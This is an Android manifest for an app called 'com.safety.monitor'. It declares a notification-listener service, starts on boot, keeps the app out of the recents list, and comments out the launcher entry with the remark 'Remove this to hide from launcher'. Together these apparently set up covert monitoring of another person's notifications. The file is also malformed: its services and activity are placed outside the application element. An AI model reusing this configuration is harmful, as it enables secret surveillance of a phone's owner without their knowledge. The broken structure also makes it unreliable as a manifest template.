<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.safety.monitor">

    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    
    <service android:name=".service.NotificationListener"
        android:label="@string/app_name"
        android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"
        android:exported="false">
        <intent-filter>
            <action android:name="android.service.notification.NotificationListenerService" />
        </intent-filter>
    </service>
    
    <service android:name=".service.BackgroundService"/>
    
    <activity
        android:name=".MainActivity"
        android:excludeFromRecents="true"
        android:taskAffinity=""
        android:launchMode="singleInstance"
        android:exported="true">
        <intent-filter>
            <!-- Remove this to hide from launcher -->
            <!-- <category android:name="android.intent.category.LAUNCHER" /> -->
        </intent-filter>
    </activity>
    
    <application
        android:usesCleartextTraffic="true"
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppTheme">
    </application>
</manifest> 